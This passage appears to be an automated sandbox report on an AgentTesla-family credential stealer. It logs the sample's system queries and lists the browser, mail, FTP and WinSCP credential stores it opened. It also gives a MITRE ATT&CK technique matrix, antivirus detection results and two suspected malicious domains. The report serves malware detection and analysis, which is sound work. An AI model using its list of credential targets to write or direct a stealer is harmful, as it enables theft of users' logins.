                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.36caa98.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.37dd780.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.36caa98.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.935726036.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.713196181.0000000003609000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe PID: 3740, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe PID: 6412, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: Yara matchFile source: 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe PID: 6412, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.36caa98.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.37dd780.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.36caa98.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.935726036.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.713196181.0000000003609000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe PID: 3740, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe PID: 6412, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Masquerading11OS Credential Dumping2Query Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools11Credentials in Registry1Security Software Discovery211Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion141Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSVirtualization/Sandbox Evasion141Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing3Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery114Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe14%ReversingLabsWin32.Trojan.Mardom

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      7.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      insergejk.com0%VirustotalBrowse
                      mail.insergejk.com1%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
